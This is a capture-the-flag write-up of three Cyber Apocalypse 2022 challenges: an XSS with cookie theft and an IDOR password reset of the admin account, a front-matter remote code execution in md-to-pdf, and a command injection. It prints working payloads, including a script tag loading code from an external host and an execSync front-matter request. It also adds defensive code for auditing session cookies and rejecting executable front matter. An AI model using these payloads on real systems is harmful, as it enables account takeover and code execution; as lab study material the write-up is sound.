Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up


https://ctf.hackthebox.com/static/ca/cyber_apocalypse_2022_ca.jpg

Hello everyone, I am Hac, and today we are doing Cyber Apocalypse CTF 2022, specifically these challenges:

- Kryptos Support (Web)
- BlinkerFluids (web)
- Compressor (Misc)

We will start with Kryptos Support (Web). Let's go!

On visiting the page, we see that there is an input field where we can give some input; after that it is checked by the admin (it's like a reporting system where our report will be checked by the admin user or some other group of users).

I was wondering what I could do with this. I have played a good amount of CTFs (still a noob), so I thought to try XSS, but not your traditional alert(1): since things are not happening on our side, we need to know whether our payload is working or not. That's why I am using XSS Hunter; there are other ways to do this, but I will stick with XSS Hunter. This is our payload:

```html
"><script src=https://someone-in-somewhere-redacted.com></script>
```

And boom, our XSS payload fired. I was wondering what I could do from here. One thing was really interesting to me: we are able to get the cookie, which could belong to the admin or some other user with the same or slightly lower privilege.

Since we don't have any cookie on our side, the cookie was interesting to me.

##### Cookies (Non-HTTPOnly)
`session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI1MzQ4ODV9.JO12yEA44QxXgfUmL3n6Sm4Et2AJc5rkvXkvSMdmFOI`

Now we can add that cookie in our browser.
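Before reusing a leaked session token it is worth reading what it actually carries. The block below is an added example, not code from the write-up or the challenge: it base64url-decodes the header and payload of the cookie quoted above (without verifying the signature, since the key is unknown) and lists the findings a defender would raise about the token and the way it was delivered. The `cookieAttrs` list is an assumption standing in for the `Set-Cookie` attributes; the write-up only states that the cookie was not HttpOnly.

```javascript
// Added example (not from the write-up): inspect the leaked session cookie
// without verifying it, so a defender can see what the token carries.
// LEAKED_SESSION is the token quoted in the write-up.
const LEAKED_SESSION =
  "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9." +
  "eyJ1c2VybmFtZSI6Im1vZGVyYXRvciIsInVpZCI6MTAwLCJpYXQiOjE2NTI1MzQ4ODV9." +
  "JO12yEA44QxXgfUmL3n6Sm4Et2AJc5rkvXkvSMdmFOI";

// base64url -> UTF-8 string, restoring the padding that JWTs strip.
function b64urlDecode(segment) {
  const b64 = segment.replace(/-/g, "+").replace(/_/g, "/");
  const padded = b64 + "=".repeat((4 - (b64.length % 4)) % 4);
  return Buffer.from(padded, "base64").toString("utf8");
}

// Split a compact JWS into its three parts and parse header and payload.
// No signature check is done here: this is for reading, not for trusting.
function decodeJwtUnverified(token) {
  const parts = token.split(".");
  if (parts.length !== 3) {
    throw new Error("not a compact JWS (expected 3 segments)");
  }
  return {
    header: JSON.parse(b64urlDecode(parts[0])),
    payload: JSON.parse(b64urlDecode(parts[1])),
    signature: parts[2],
  };
}

// Findings a reviewer would raise about this token and how it was delivered.
// `cookieAttrs` is the Set-Cookie attribute list (assumed for the example).
function auditSessionCookie(token, cookieAttrs) {
  const { header, payload } = decodeJwtUnverified(token);
  const attrs = cookieAttrs.map((a) => a.toLowerCase());
  const findings = [];
  if (!attrs.includes("httponly")) {
    findings.push("cookie readable from JavaScript (no HttpOnly), so XSS can steal it");
  }
  if (!attrs.includes("secure")) {
    findings.push("cookie sent over plain HTTP (no Secure)");
  }
  if (payload.exp === undefined) {
    findings.push("no exp claim: a stolen token never expires");
  }
  if (header.alg === "none") {
    findings.push("alg=none must be rejected by the verifier");
  }
  return { header, payload, findings };
}
```

Run against the quoted token, the payload comes out as `{"username":"moderator","uid":100,"iat":1652534885}`: a moderator session, not admin, with an issued-at time but no expiry, which is why the stolen cookie stays usable for the whole challenge.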

[Screenshot: adding the cookie in the browser]

After that we will navigate to /tickets (thanks to my amazing team member KDirectorate).

I was wondering what I could do here; the page seems to be static (except for a few things). I tried /rfid/somenumbers and so on, but no luck.

Then one of my team mates (KDirectorate) said to "check /setting, which has password reset functionality", which was really interesting. I navigated to /setting and intercepted the response in Burp Suite.

There were two fields: one was "password" and the other was "uid" (which was like a username).

Then I thought: what if I change the value of uid to 1? (Most of the time 1 = admin.)

And boom, I was able to change the password of admin. After that I tried to log in as admin and I was successful.

BlinkerFluids (Web)

In this challenge there is an RCE in md-to-pdf which we will use to get the flag (thanks KDirectorate). If we check the challenge files we will come across:

```js
'--no-sandbox', '--js-flags=--noexpose_wasm,--jitless
```

Here `--no-sandbox` means that Chromium's sandbox is disabled, so we have access to the host environment.

Some resources which I used to learn about this exploit:

So we will intercept it in Burp Suite and add our payload:

```text
---js\n((require('child_process')).execSync('id > /tmp/RCE.txt'))\n---RCE
```

And we are able to execute our code:

```http
POST /api/invoice/add HTTP/1.1
Host: 46.101.27.51:32374
Content-Length: 24
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://46.101.27.51:32374
Referer: http://46.101.27.51:32374/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{"markdown_content":"---js\n((require('child_process')).execSync('ls > static/RCE.txt'))\n---RCE"}
```

We can get the flag by simple enumeration.
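What makes the payload above work is the `---js` front-matter block: the Markdown converter evaluates a JavaScript front matter in the Node process before any PDF is rendered, so the browser flags are not the boundary that matters for this input. From the application's side, an invoice endpoint never needs front matter at all, so the cheapest fix is to refuse it at the boundary. The block below is an added example, not code from the challenge or from md-to-pdf: a small front-matter parser that recognises the `---<engine>` opening line and a policy function that rejects any front matter, naming the executable engines explicitly so the log entry records what was attempted. The sample input is the write-up's own payload.

```javascript
// Added example (not the challenge's or md-to-pdf's code): screen Markdown
// submitted to /api/invoice/add before it reaches a converter that honours
// front matter. Front matter opens with `---`, optionally followed by an
// engine name (`---js`, `---json`), and closes with `---`.
const FRONT_MATTER_RE = /^---([a-zA-Z]*)[ \t]*\r?\n([\s\S]*?)\r?\n---/;

// Returns null when no front matter is present, otherwise its engine
// name ("" means the default, YAML) and the raw body between the fences.
function parseFrontMatter(markdown) {
  const m = FRONT_MATTER_RE.exec(markdown);
  if (!m) return null;
  return { engine: m[1].toLowerCase(), body: m[2] };
}

// Engines that evaluate code rather than parse data.
const EXECUTABLE_ENGINES = new Set(["js", "javascript"]);

// Policy for user-supplied invoices: front matter is never needed for an
// invoice, so reject any, and call out the executable case explicitly so
// the operator can tell a probe from a formatting mistake.
function checkInvoiceMarkdown(markdown) {
  const fm = parseFrontMatter(markdown);
  if (fm === null) return { ok: true };
  if (EXECUTABLE_ENGINES.has(fm.engine)) {
    return { ok: false, reason: `executable front matter (engine "${fm.engine}") rejected` };
  }
  return { ok: false, reason: "front matter not allowed in invoices" };
}

// The payload quoted in the write-up, as the sample input.
const SAMPLE_PAYLOAD =
  "---js\n((require('child_process')).execSync('id > /tmp/RCE.txt'))\n---RCE";
```

Calling `checkInvoiceMarkdown(SAMPLE_PAYLOAD)` returns `ok: false` with the "executable front matter" reason, while ordinary invoice Markdown (headings, tables, lists) passes untouched; a Markdown table separator such as `|---|---|` is not mistaken for a fence because the pattern is anchored to the very start of the document.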

Compressor (Misc)

In this challenge we will take advantage of command injection to get the flag.

This one is easy, so I will go quick.

We are able to execute different commands, and with simple enumeration we can find the flag.
